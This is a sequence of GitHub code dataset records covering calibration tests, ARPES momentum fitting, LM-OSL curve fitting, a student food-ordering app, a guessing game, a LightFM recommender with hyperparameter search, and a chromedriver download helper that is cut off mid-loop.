scores = [2.7, 0.4, 0.4, 0.4, 1.2, 2.2, 0.7, 0.3]\n classes = [1, 1, 1, 0, 0, 1, 0, 0]\n ic = IsotonicCalibration(None)\n cal_pairs = ic.fit_isotonic_regression(scores, classes)\n model = ic.isotonic_regression_model(cal_pairs)\n ic.cal_model = model\n for i in [0.3, 0.5, 0.7, 1.2, 2.2, 2.7]:\n print(ic.predict(i))\n\n\n\ndef tests():\n measure_tests()\n isocal_test()\n isocal_test2()\n isocal_test3()\n\n\n\nif __name__ == \"__main__\":\n tests()","repo_name":"mlkruup/bayesiso","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"74013663304","text":"r\"\"\"Contains models and utilities for \"curve fitting\" the forward momentum conversion function.\n\nThis allows for rapid fine tuning of the angle offsets used in momentum conversion.\n\nIf the user calculates, places, or curve fits for the high symmetry\nlocations in the data $H_i(\\phi,\\psi,\\theta,\\beta,\\chi)$, these can be used\nas waypoints to find a set of $\\Delta\\phi$, $\\Delta\\theta$, $\\Delta\\chi$, etc.\nthat minimize\n\n$$\n\\sum_i \\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|^2\n$$\n\nwhere $S_j$ enumerates the high symmetry points of the known Brillouin zone, and $\\text{P}$\nis the function that maps forwards from angle to momenta. This can also\nbe used to calculate moiré information, but using the (many) available\nhigh symmetry points of the moiré superlattice to get a finer estimate of\nrelative angle alignment, lattice incommensuration, and strain than is possible\nusing the constituent lattices and Brillouin zones.\n\"\"\"\n\nimport numpy as np\n\nfrom arpes.utilities.conversion.forward import convert_coordinates\n\n\n__all__ = (\"HighSymmetryPointModel\",)\n\n\ndef k_points_residual(paramters, coords_dataset, high_symmetry_points, dimensionality=2):\n momentum_coordinates = convert_coordinates(coords_dataset)\n if dimensionality == 2:\n return np.asarray(\n [\n np.diagonal(momentum_coordinates.kx.values),\n np.diagonal(momentum_coordinates.ky.values),\n ]\n )\n else:\n return np.asarray(\n [\n np.diagonal(momentum_coordinates.kx.values),\n np.diagonal(momentum_coordinates.ky.values),\n np.diagonal(momentum_coordinates.kz.values),\n ]\n )\n\n\ndef minimum_forward_error(\n coordinate_samples,\n phi_offset=0,\n psi_offset=0,\n theta_offset=0,\n beta_offset=0,\n chi_offset=0,\n high_symmetry_points=None,\n):\n r\"\"\"Sets offsets for a coordinate sample dataset before converting them all to momentum.\n\n Then, for each sample, the closest high symmetry point among the provided\n `high_symmetry_points` is calculated, and the distance to the high symmetry point obtained.\n The distance of each of the coordinate samples to these symmetry points is returned, and the\n optimizer adjusts the offsets to find a \"best\" set in the sense of least total L2 distance\n to the symmetry points.\n\n If the coordinate samples are labelled as described above as H_i, then we return\n\n $$\n \\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|\n $$\n\n and the optimizer attempts to optimize for\n\n $$\n \\sum_i \\left((\\text{min}_j |text{P}(H_i, \\Delta\\phi, \\Delta\\theta, \\ldots) - S_j|^2)\\right)^2.\n $$\n\n We can therefore control the metric by returning a different distance back to the optimizer, if desired.\n For instance, the L1 distance can be optimized if desired by instead returning\n\n $$\n \\text{min}_j |text{P}(H_i, \\Delta\\phi, 
\\Delta\\theta, \\ldots) - S_j|^\\frac{1}{2}\n $$\n\n Args:\n coordinate_samples: (N, 6 + 1)\n phi_offset\n psi_offset\n theta_offset\n beta_offset\n chi_offset\n high_symmetry_points\n\n Returns:\n The MSE distance error for this set of coordinate offsets.\n \"\"\"\n pass\n","repo_name":"chstan/arpes","sub_path":"arpes/fits/zones.py","file_name":"zones.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"1735757044","text":"# Analysis of 3-component LM-OSL signal\r\nfrom scipy import optimize\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom prettytable import PrettyTable\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\ndata = np.loadtxt('CaF2LMOSL.txt')\r\nx_data,y_data = data[:, 0], data[:, 1] \r\ndef LM(x,N,tau):\r\n u=np.abs(N)*(x/P)*(np.exp(-(x**2.0)\\\r\n /(2*P*abs(tau))))\r\n return u\r\ndef total_FOKLM(x, *inis): \r\n u=np.array([0 for i in range(len(x_data))])\r\n Ns, taus = inis[0:nPks], inis[nPks:2*nPks]\r\n for i in range(nPks): \r\n u=u+LM(x,Ns[i],taus[i])\r\n u=u+bgd*x/P\r\n return u\r\nnPks= 3 \r\nP=int(max(x_data))\r\nt=np.linspace(0,P,P)\r\ninis=[1400,1,800,.1,500,.01]\r\nbgd=y_data[-1]\r\nparams,cov =optimize.curve_fit(total_FOKLM,x_data,\\\r\ny_data,p0=inis)\r\nparams, cov = optimize.curve_fit(total_FOKLM,\\\r\nx_data,y_data,p0=inis,maxfev=10000) \r\nplt.scatter(x_data, y_data,c='r',label=r'CaF$_2$:Mn LM-OSL')\r\nplt.plot(x_data, total_FOKLM(x_data, \r\n *params),c='black',label='Original FOK-LM eqt',linewidth=1)\r\ntotalArea=sum(total_FOKLM(x_data, *params))\r\nsums,pc=[0]*nPks, [0]*nPks\r\nfor i in range(0,nPks): \r\n FOKLMi=LM(x_data, params[i],params[nPks+i])\r\n sums[i]=np.sum(FOKLMi)\r\n plt.plot(x_data,FOKLMi)\r\nplt.plot(t,bgd*t/P)\r\nfor j in range(nPks):\r\n pc[j]=round(100*sums[j]/totalArea,1) \r\npcbgd=round(100*sum(bgd*x_data/P)/totalArea)\r\nleg = plt.legend()\r\nleg.get_frame().set_linewidth(0.0) \r\nplt.ylabel('LM-OSL [a.u.]')\r\nplt.xlabel(r'Stimulation time [s]')\r\nres=total_FOKLM(x_data, *params)-y_data\r\nFOM=round(100*np.sum(abs(res))/np.sum(y_data),1)\r\nprint('FOM=',FOM,' %')\r\nplt.show()\r\nNs=[round(x,1) for x in params[0:nPks]]\r\ntaus=[round(x,2) for x in params[nPks:2*nPks]] \r\ndN=[round(np.sqrt(cov[x][x]),1) for x in range(3)]\r\ndtaus=[round(np.sqrt(cov[x][x]),2) for x in range(3,6)]\r\nmyTable = PrettyTable([ \"N (a.u.)\",\"dN (a.u)\",\\\r\n'tau (s)',\"dtau (s)\",\"Area [%]\"]) \r\nfor j in range(nPks):\r\n myTable.add_row([Ns[j],dN[j],taus[j],dtaus[j],pc[j]])\r\nmyTable.add_row(['','','','','bgd='+str(pcbgd)+'%'])\r\nprint(myTable)","repo_name":"vpagonis/Python-Codes","sub_path":"Ch9PagonisGitHub/Code 9.6.py","file_name":"Code 9.6.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41051239538","text":"from project import client\nfrom project.client import Client\nfrom project.meals.meal import Meal\n\n\nclass FoodOrdersApp:\n\n VALID_MEALS = (\n \"Starter\",\n \"MainDish\",\n \"Dessert\",\n )\n\n def __init__(self):\n self.menu = []\n self.clients_list = []\n self.receipt_id = 1\n\n def register_client(self, client_phone_number: str):\n try:\n client = next(filter(lambda c: c.phone_number == client_phone_number, self.clients_list))\n except StopIteration:\n raise Exception(\"The client has already been registered!\")\n\n self.clients_list.append(client.client_phone_number)\n return f\"Client 
{client_phone_number} registered successfully.\"\n\n def add_meals_to_menu(self, *meals: Meal):\n meals = [meal for meal in meals if meal.__class__.__name__ in self.VALID_MEALS]\n self.menu.append(meals)\n\n def show_menu(self):\n if len(self.menu) < 5:\n raise Exception(\"The menu is not ready!\")\n\n return '\\n'.join(str(meal.details()) for meal in self.menu)\n\n def __get_or_create_client(self, client_phone_number):\n for client in self.clients_list:\n if client.phone_number == client_phone_number:\n return client\n\n new_client = Client(client_phone_number)\n self.clients_list.append(new_client)\n return new_client\n\n def __get_menu(self):\n return {meal.name: meal for meal in self.menu}\n\n def add_meals_to_shopping_cart(self, client_phone_number: str, **meal_names_and_quantities):\n if len(self.menu) < 5:\n raise Exception(\"The menu is not ready!\")\n\n find_client = self.__get_or_create_client(client_phone_number)\n menu_info = self.__get_menu()\n\n for meal in meal_names_and_quantities:\n if meal not in self.menu:\n raise Exception(f\"{meal.meal_name} is not on the menu!\")\n\n for meal_name, quantity in meal_names_and_quantities.items():\n if menu_info[meal_name].quantity < quantity:\n raise Exception(f\"Not enough quantity of {menu_info[meal].__class__.__name__}: {meal}!\")\n\n for meal_name, quantity in meal_names_and_quantities.items():\n menu_info[meal_name].quantity -= quantity\n find_client.shopping_cart.append(menu_info[meal_name])\n\n find_client.bill += sum(menu_info[name].price * quantity for name, quantity in meal_names_and_quantities.items())\n find_client.ordered_meals.update(meal_names_and_quantities)\n\n return f\"Client {client_phone_number} successfully ordered {', '.join(find_client.ordered_meals)} for {find_client.bill:.2f}lv.\"\n\n def cancel_order(self, client_phone_number: str):\n new_client = self.__get_or_create_client(client_phone_number)\n\n if not client.shopping_cart:\n raise Exception(\"There are no ordered meals!\")\n\n menu_info = self.__get_menu()\n\n for name, qty in new_client.ordered_meals.items():\n menu_info[name].quantity += qty\n\n new_client.bill = 0\n new_client.shopping_cart = []\n new_client.ordered_meals = {}\n\n return f\"Client {new_client.phone_number} successfully canceled his order.\"\n\n def finish_order(self, client_phone_number: str):\n new_client = self.__get_or_create_client(client_phone_number)\n\n if not client.shopping_cart:\n raise Exception(\"There are no ordered meals!\")\n\n current_receipt_id = self.receipt_id\n self.receipt_id += 1\n total_bill = new_client.bill\n\n new_client.bill = 0\n new_client.shopping_cart = []\n new_client.ordered_meals = {}\n\n return f\"Receipt #{current_receipt_id} with total amount of {total_bill:.2f} was successfully paid for {client_phone_number}.\"\n\n def __str__(self):\n return f\"Food Orders App has {len((self.menu))} meals on the menu and {len(self.clients_list)} clients.\"","repo_name":"KonstantinPetkov/SoftUni-OOP","sub_path":"exam_preparation_22_08_22/project/food_orders_app.py","file_name":"food_orders_app.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18662821372","text":"from game_data import data\nfrom art import logo,vs\nfrom replit import clear\nimport random\n\ndef get_arandom():\n return random.choice(data)\n\ndef account_data(account):\n name = account['name']\n description = account['description']\n country = account['country']\n return f\"{name}, {description}, 
{country}.\"\n \ndef answer_check(followers_a,followers_b,answer):\n if followers_a > followers_b:\n return answer == 'a'\n else:\n return answer == 'b'\n \n\ndef game():\n score =0\n should_countinue = True\n print(logo)\n account_a = get_arandom()\n account_b = get_arandom()\n\n while should_countinue:\n account_a = account_b\n account_b = get_arandom()\n \n while account_a == account_b:\n account_b = get_arandom()\n \n print(\"Compare A: \",account_data(account_a))\n print(vs)\n print(\"Against B: \",account_data(account_b))\n \n answer = input(\"Who has more followers? Type 'A' or 'B': \").lower()\n followers_a = account_a['follower_count']\n followers_b = account_b['follower_count']\n is_check = answer_check(followers_a,followers_b,answer)\n \n clear()\n print(logo)\n \n if is_check:\n score +=1\n print(f\"You're right! Current score: {score}\")\n else:\n should_countinue = False\n print(f\"Sorry, that's wrong. Final score: {score}\")\n\ngame()\n","repo_name":"Abdirashid-dv/100Days-of-code-python","sub_path":"Day-14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9242696832","text":"import unittest\n\nfrom app import app\n\n\nclass AppTestCase(unittest.TestCase):\n\n def test_ping(self):\n tester = app.test_client(self)\n response = tester.get('/ping')\n assert 'PONG' in response.data\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Dantergy/etl_api","sub_path":"integration-skill-test-server-master/webapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14591912478","text":"from functools import partial, reduce\nimport itertools\nfrom lightfm import LightFM\nfrom lightfm.cross_validation import random_train_test_split\nfrom lightfm.data import Dataset\nfrom lightfm.evaluation import auc_score, precision_at_k, recall_at_k\nimport numpy as np\nimport operator\nimport os\nimport pandas as pd\nimport random\nimport scipy.sparse as sp\nfrom scipy.stats import rankdata\nimport time\n\n\nclass ParameterGrid(object):\n \"\"\"Grid of parameters with a discrete number of values for each.\n Can be used to iterate over parameter value combinations with the Python built-in function iter.\n Adapted from scikit-learn\n ----------\n param_grid : dict of string to sequence\n The parameter grid to explore, as a dictionary mapping estimator parameters to sequences of allowed values.\n An empty dict signifies default parameters.\n\n \"\"\"\n\n def __init__(self, param_grid):\n\n self.param_grid = [param_grid]\n\n def __iter__(self):\n \"\"\"Iterate over the points in the grid.\n Returns\n -------\n params : iterator over dict of string to any\n Yields dictionaries mapping each estimator parameter to one of its allowed values.\n \"\"\"\n for p in self.param_grid:\n # Always sort the keys of a dictionary, for reproducibility\n items = sorted(p.items())\n if not items:\n yield {}\n else:\n keys, values = zip(*items)\n for v in itertools.product(*values):\n params = dict(zip(keys, v))\n yield params\n\n def __len__(self):\n \"\"\"Number of points on the grid.\"\"\"\n # Product function that can handle iterables (np.product can't).\n product = partial(reduce, operator.mul)\n return sum(product(len(v) for v in p.values()) if p else 1\n for p in self.param_grid)\n\n\nclass LFM:\n \"\"\"Latent Factor Model (LFM) class, based on 
LightFM\n It must be initalized either with a set of interactions in sparse COO format, or with the path to the csv file with\n the ratings matrix (user x items)\n Interactions and weights are then processed and loaded as properties in accordance with LightFM expected structure\n \"\"\"\n\n def __init__(self,\n interactions=None,\n weights=None,\n path=None,\n category=None,\n use_weights=False,\n **kwargs):\n \"\"\"\n :param interactions: sparse COO matrix containing every user-item interaction\n :param weights: sparse COO matrix containing the weights of each user-item interaction\n :param path:(string) - path to the csv file to be processed - must be a user x item ratings matrix or a user:\n item interactions list\n :param type:(string) \"interactions\" or \"ratings_matrix\" to guide the data pre-processing\n :param kwargs: legacy, originally used to initialize Connector class - to be updated when dealing with db\n \"\"\"\n # Check that the user has supplied some input, implicit or explicit\n if interactions is None and path is None:\n raise ValueError(\"The user must provide a path to a file or some interactions to instantiate the class\")\n # Check that if a path has been supplied the variable type is valid\n if path is not None and (category != \"interactions\" and category != \"ratings_matrix\"):\n raise ValueError(\"The parameter 'category' must be provided and can only take one of two values: \"\n \"'interactions' or 'ratings_matrix'\")\n # Make sure the interactions and weights, if supplied, are in the correct format\n if interactions is not None and type(interactions) != sp.coo.coo_matrix:\n raise TypeError(\"The interactions object must be a scipy sparse COO matrix!\")\n if weights is not None and type(weights) != sp.coo.coo_matrix:\n raise TypeError(\"The weights object must be a scipy sparse COO matrix!\")\n\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n self._category = category\n self._interactions = interactions\n self.mapping = None\n self.model = None\n self.path = path\n self._use_weights = use_weights\n self._weights = weights\n\n @property\n def interactions(self):\n # If interactions have not been supplied, process the file provided in source\n # N.B. 
This property also sets weights, which is probably not a best practice\n if self._interactions is None:\n\n if self._category == 'ratings_matrix':\n rm_df = pd.read_csv(self.path)\n ids = rm_df['sub']\n rm_df = rm_df.set_index(keys='sub')\n if 'Unnamed: 0' in rm_df.columns:\n rm_df.drop('Unnamed: 0', axis=1, inplace=True)\n dataset = Dataset()\n dataset.fit(list(ids),\n list(rm_df.columns))\n self.mapping = dataset.mapping()\n\n interactions = []\n\n for item in rm_df.columns.tolist():\n users = rm_df.index[rm_df[item] >= 1].tolist()\n counts = rm_df[item][rm_df[item] >= 1]\n interactions.extend(zip(users, itertools.repeat(item, len(users)), counts))\n\n (self._interactions, self._weights) = dataset.build_interactions(interactions)\n\n else:\n int_df = pd.read_csv(self.path)\n if 'Unnamed: 0' in int_df.columns:\n int_df.drop('Unnamed: 0', axis=1, inplace=True)\n int_df = int_df.groupby(['subscriber_id', 'ddi_block_id']).size().reset_index()\\\n .rename(columns={0:'count'})\n dataset = Dataset()\n ids = int_df['subscriber_id'].unique()\n items = int_df['ddi_block_id'].unique()\n dataset.fit(list(ids),\n list(items))\n self.mapping = dataset.mapping()\n\n if self._use_weights:\n interactions = zip(int_df['subscriber_id'], int_df['ddi_block_id'], int_df['count'])\n else:\n interactions = zip(int_df['subscriber_id'], int_df['ddi_block_id'])\n (self._interactions, self._weights) = dataset.build_interactions(interactions)\n\n else:\n return self._interactions\n\n @interactions.setter\n def interactions(self, value):\n self._interactions = value\n\n @property\n def weights(self):\n if self._weights is None:\n pass # to be implemented\n else:\n return self._weights\n\n @weights.setter\n def weights(self, value):\n self._weights = value\n\n def init_model(self,\n no_components=10,\n k=5,\n n=10,\n learning_schedule='adagrad',\n loss='logistic',\n learning_rate=0.05,\n rho=0.95,\n epsilon=1e-06,\n item_alpha=0.0,\n user_alpha=0.0,\n max_sampled=10,\n random_state=None):\n \"\"\"\n Initialize model to be evaluated.\n :param no_components:(int, optional) – the dimensionality of the feature latent embeddings.\n :param k:(int, optional) – for k-OS training, the k-th positive example will be selected from the\n n positive examples sampled for every user.\n :param n:(int, optional) – for k-OS training, maximum number of positives sampled for each update.\n :param learning_schedule:(string, optional) – one of (‘adagrad’, ‘adadelta’).\n :param loss:(string, optional) – one of (‘logistic’, ‘bpr’, ‘warp’, ‘warp-kos’): the loss function.\n :param learning_rate:(float, optional) – initial learning rate for the adagrad learning schedule.\n :param rho:(float, optional) – moving average coefficient for the adadelta learning schedule.\n :param epsilon:(float, optional) – conditioning parameter for the adadelta learning schedule.\n :param item_alpha:(float, optional) – L2 penalty on item features.\n :param user_alpha:(float, optional) – L2 penalty on user features.\n :param max_sampled:(int, optional) – maximum number of negative samples used during WARP fitting.\n :param random_state:(int seed, RandomState instance, or None)\n \"\"\"\n self.model = LightFM(no_components=no_components,\n k=k,\n n=n,\n learning_schedule=learning_schedule,\n loss=loss,\n learning_rate=learning_rate,\n rho=rho,\n epsilon=epsilon,\n item_alpha=item_alpha,\n user_alpha=user_alpha,\n max_sampled=max_sampled,\n random_state=random_state)\n\n def train(self,\n interactions,\n partial=False,\n user_features=None,\n item_features=None,\n 
sample_weight=None,\n epochs=1,\n verbose=False):\n \"\"\"\n Train the model in self.model either partially (i.e. for one epoch, starting from the last trained parameters)\n or till the end, for a maximum number of epochs\n :param interactions:(COO matrix, required) - set of training user-item interactions\n :param partial:(bool, optional) - fit the model partially if True, to completion otherwise\n :param user_features:(CSR matrix of shape [n_users, n_user_features], optional) - set of user features\n :param item_features:(CSR matrix of shape [n_items, n_item_features], optional) - set of item features\n :param sample_weight:(COO matrix, optional) - matrix with entries expressing weights of individual interactions\n :param epochs:(int, optional) - number of epochs for the training, only used if partial==False\n :param verbose:(bool, optional) – whether to print progress messages\n \"\"\"\n if partial:\n self.model.fit_partial(interactions=interactions,\n user_features=user_features,\n item_features=item_features,\n sample_weight=sample_weight,\n epochs=1,\n verbose=verbose)\n else:\n self.model.fit(interactions=interactions,\n user_features=user_features,\n item_features=item_features,\n sample_weight=sample_weight,\n epochs=epochs,\n verbose=verbose)\n\n @staticmethod\n def evaluate_model(model, metric, test, train):\n \"\"\"\n Evaluate trained model on the test set, using one of the three available accuracy metrics\n AUC: the probability that a randomly chosen positive example has a higher score than a randomly chosen\n negative example.\n Precision: the fraction of known positives in the first k positions of the ranked list of results.\n Recall: the number of positive items in the first k positions of the ranked list of results divided by the\n number of positive items in the test period.\n :param model:(LightFM, required) - model to be evaluated\n :param metric:(string, required) - accuracy metric to be used, one of ['auc', 'precision', 'recall']\n :param test:(COO matrix, required) - known positives used to test the model\n :param train:(COO matrix, required) - training set; these interactions will be omitted from the score\n calculations to avoid re-recommending known positives.\n :return: test_score (float) - score computed on the test set\n \"\"\"\n try:\n # make sure the metric is correct\n assert metric in ['auc', 'precision', 'recall']\n if metric == 'auc':\n test_score = auc_score(model, test, train).mean()\n elif metric == 'precision':\n test_score = precision_at_k(model, test, train, k=5).mean()\n else:\n test_score = recall_at_k(model, test, train, k=5).mean()\n return test_score\n except AssertionError:\n print('The metric provided is not correct or available!')\n\n def grid_search(self,\n params,\n metric='auc',\n max_iterations=None,\n max_epochs=50,\n early_stopping=False,\n use_weights=False):\n \"\"\"\n Standard grid search method to select the hyper-parameters that result in the highest score on the test set.\n Uses ParameterGrid class from scikit-learn in order to create an iterable of all possible hyper-parameter\n combinations.\n The user can supply a max_iterations value that will stop the search once said number of combinations has been\n reached. 
Furthermore, early_stopping can be set to True to stop the training of a particular model when the test\n score has stopped improving, which is particularly useful when overfitting.\n :param params:(dict, required) - dictionary of parameters to test, {parameter: [list of values to try]}\n :param metric:(string, optional) - metric to use to pick the best model\n :param max_iterations:(int, optional) - if provided, the hyper-parameter optimization will stop after this many\n tests, irrespective of len(ParameterGrid(params))\n :param max_epochs:(int, optional) - max number of epochs to train each model\n :param early_stopping:(bool, optional) - if True, the training of a model will be partial and will stop after 5\n epochs of non-improvement on the test score; the model will then be re-trained using the optimal number\n of epochs\n :param use_weights:(bool, optional) - if True, the training procedure will use weights to value repeated\n interactions more\n \"\"\"\n # Raise an error if any of the parameters supplied is not one of the arguments used by self.init_model\n valid_params = self.init_model.__code__.co_varnames\n if any([x not in valid_params for x in params.keys()]):\n raise ValueError(\"One of the hyper-parameters supplied is invalid. Please make sure there are no typos.\")\n # Reset best values\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n\n # Create train and test datasets\n (train_set, test_set) = random_train_test_split(self._interactions, test_percentage=0.2)\n # Since we cannot provide the same seed to random_train_test_split, using it on self._weights would generate a\n # set of weights that doesn't match train_set; we are thus forced to use the following convoluted procedure\n if use_weights and self._weights is not None:\n weights_csr = self._weights.tocsr()\n data = [weights_csr[u, i] for u, i in zip(train_set.row, train_set.col)]\n\n train_weights = sp.coo_matrix((data,\n (train_set.row,\n train_set.col)),\n shape=self._weights.shape,\n dtype=self._weights.dtype)\n else:\n train_weights = None\n\n # Create ParameterGrid instance to be iterated\n grid = ParameterGrid(params)\n # If max_iterations has not been provided then test all parameter combinations\n if not max_iterations:\n max_iterations = len(grid)\n # Turn grid from iterable to iterator\n grid = iter(grid)\n test_params = next(grid)\n test_params_idx = 1\n\n start_time = time.time()\n\n while test_params and test_params_idx <= max_iterations:\n # Initialize model with current combination of hyper-parameters to be tested\n self.init_model(**test_params)\n\n if early_stopping:\n best_iter = 0\n best_score = 0\n iters_no_improvement = 0\n # Train the model for max_epochs, evaluating it at each step\n for i in range(max_epochs):\n self.train(train_set, sample_weight=train_weights, partial=True)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n if test_score > best_score:\n best_iter = i+1\n best_score = test_score\n iters_no_improvement = 0\n else:\n iters_no_improvement += 1\n # If the test score has not improved in the last 5 epochs stop the training\n if iters_no_improvement == 5:\n break\n # If the last epoch did not result in the highest test score, re-train the model for the optimal number\n # of epochs\n if best_iter != max_epochs:\n self.init_model(**test_params)\n self.train(train_set, sample_weight=train_weights, epochs=best_iter)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n else:\n self.train(train_set, 
sample_weight=train_weights, epochs=max_epochs)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n # If the test score achieved by this model was the highest so far, set the class variables accordingly\n if test_score > self.best_score:\n self.best_model = self.model\n self.best_params = test_params\n self.best_score = test_score\n\n elapsed_time = (time.time() - start_time)/60\n\n print('Hyperparameters tested: {}/{}; {} score: {}; total time: {:.2f} minutes'.format(test_params_idx,\n max_iterations,\n metric,\n test_score,\n elapsed_time))\n\n test_params = next(grid)\n test_params_idx += 1\n\n print('The best model achieved a {} score of {} on the test set, with parameters {}'.format(metric,\n self.best_score,\n self.best_params))\n\n def randomized_search(self,\n params,\n metric='auc',\n max_iterations=None,\n max_epochs=50,\n early_stopping=False,\n use_weights=False):\n \"\"\"\n Standard randomized search method to select the hyper-parameters that result in the highest score on the test\n set. Each iteration will sample one of the possible combinations of hyper-parameters.\n Uses ParameterGrid class from scikit-learn in order to create an iterable of all possible hyper-parameter\n combinations.\n The user can supply a max_iterations value that will stop the search once said number of combinations has been\n reached. Furthermore, early_stopping can be set to True to stop the training of a particular model when the test\n score has stopped improving, which is particularly useful when overfitting.\n :param params:(dict, required) - dictionary of parameters to test, {parameter: [list of values to try]}\n :param metric:(string, optional) - metric to use to pick the best model\n :param max_iterations:(int, optional) - if provided, the hyper-parameter optimization will stop after this many\n tests, irrespective of len(ParameterGrid(params))\n :param max_epochs:(int, optional) - max number of epochs to train each model\n :param early_stopping:(bool, optional) - if True, the training of a model will be partial and will stop after 5\n epochs of non-improvement on the test score; the model will then be re-trained using the optimal number\n of epochs\n :param use_weights:(bool, optional) - if True, the training procedure will use weights to value repeated\n interactions more\n \"\"\"\n # Raise an error if any of the parameters supplied is not one of the arguments used by self.init_model\n valid_params = self.init_model.__code__.co_varnames\n if any([x not in valid_params for x in params.keys()]):\n raise ValueError(\"One of the hyper-parameters supplied is invalid. 
Please make sure there are no typos.\")\n\n # Reset best values\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n\n # create train and test datasets\n (train_set, test_set) = random_train_test_split(self._interactions, test_percentage=0.2)\n if use_weights and self._weights is not None:\n weights_csr = self._weights.tocsr()\n data = [weights_csr[u, i] for u, i in zip(train_set.row, train_set.col)]\n\n train_weights = sp.coo_matrix((data,\n (train_set.row,\n train_set.col)),\n shape=self._weights.shape,\n dtype=self._weights.dtype)\n else:\n train_weights = None\n\n # Create ParameterGrid instance to be iterated and cast it to list\n grid = list(ParameterGrid(params))\n # If max_iterations has not been provided then test all parameter combinations\n if not max_iterations:\n max_iterations = len(grid)\n # Shuffle the list and pop out and remove the last element\n random.shuffle(grid)\n test_params = grid.pop()\n test_params_idx = 1\n\n start_time = time.time()\n\n while test_params and test_params_idx <= max_iterations:\n # Initialize model with current combination of hyper-parameters to be tested\n self.init_model(**test_params)\n\n if early_stopping:\n best_iter = 0\n best_score = 0\n iters_no_improvement = 0\n # Train the model for max_epochs, evaluating it at each step\n for i in range(max_epochs):\n self.train(train_set, sample_weight=train_weights, partial=True)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n if test_score > best_score:\n best_iter = i+1\n best_score = test_score\n iters_no_improvement = 0\n else:\n iters_no_improvement += 1\n # If the test score has not improved in the last 5 epochs stop the training\n if iters_no_improvement == 5:\n break\n\n # If the last epoch did not result in the highest test score, re-train the model for the optimal number\n # of epochs\n if best_iter != max_epochs:\n self.init_model(**test_params)\n self.train(train_set, sample_weight=train_weights, epochs=best_iter)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n else:\n self.train(train_set, sample_weight=train_weights, epochs=max_epochs)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n # If the test score achieved by this model was the highest so far, set the class variables accordingly\n if test_score > self.best_score:\n self.best_model = self.model\n self.best_params = test_params\n self.best_score = test_score\n\n random.shuffle(grid)\n if grid:\n test_params = grid.pop()\n else:\n test_params = None\n\n elapsed_time = (time.time() - start_time)/60\n\n print('Hyperparameters tested: {}/{}; {} score: {}; total time: {:.2f} minutes'.format(test_params_idx,\n max_iterations,\n metric,\n test_score,\n elapsed_time))\n test_params_idx += 1\n\n print('The best model achieved a {} score of {} on the test set, with parameters {}'.format(metric,\n self.best_score,\n self.best_params))\n\n def predict(self,\n users,\n items,\n what='scores',\n item_features=None,\n user_features=None):\n \"\"\"\n Prediction method: once the best hyper-parameters have been selected and the resulting model has been trained,\n this can be used the get predictions for a (sub)set of users. 
The predictions can be in the form of absolute\n scores on in terms of ranks, 1 being the highest.\n :param users:(np.int32 array of shape [n_pairs,], required) - user ids for whom we want predictions\n :param items:(np.int32 array of shape [n_pairs,], required) - item ids for which we want predictions\n :param what:(string, optional) - must be 'scores' or 'ranks'\n :param user_features:(CSR matrix of shape [n_users, n_user_features], optional) - set of user features\n :param item_features:(CSR matrix of shape [n_items, n_item_features], optional) - set of item features\n :return:(np.float32 array of shape [n_pairs,]): Numpy array containing the recommendation scores for pairs\n defined by the inputs.\n \"\"\"\n # check the training has been done and we have picked a best model\n if self.best_model:\n scores = np.empty(shape=(len(users), len(items)))\n for i, user in enumerate(users):\n scores[i] = self.best_model.predict(user_ids=user,\n item_ids=items,\n user_features=user_features,\n item_features=item_features)\n if what == 'scores':\n return scores\n elif what == 'ranks':\n ranks = np.empty_like(scores)\n for i, score in enumerate(scores):\n ranks[i] = len(score) + 1 - rankdata(score).astype(int)\n return ranks\n else:\n print(\"The parameter 'how' can only be 'scores' or 'ranks'\")\n else:\n print('The model has not been trained yet!')\n","repo_name":"DalbergDataInsights/CubicA","sub_path":"modules/recommender/latent_factor_models.py","file_name":"latent_factor_models.py","file_ext":"py","file_size_in_byte":28024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31794290397","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\nfrom soup import Soup\nfrom webdriver_manager.utils import chrome_version\nimport os, glob, shutil, subprocess, zipfile\nimport pyautogui as pg\n\n\ndef help_s():\n ver = chrome_version()[:2]\n print(ver)\n n = \"\"\n if ver == \"95\":\n n = 0\n elif ver == \"94\":\n n = 1\n elif ver == \"93\":\n n = 2\n\n li = Soup.bs(\"https://chromedriver.chromium.org/downloads\")\n lis = li.find_all(\"li\", class_=\"TYR86d wXCUfe zfr3Q\")\n down = lis[n].find(\"a\", class_=\"XqQF9c\").get(\"href\")\n print(down)\n subprocess.Popen([r\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\", down])\n sleep(3)\n for i in range(4):\n pg.hotkey(\"tab\")\n 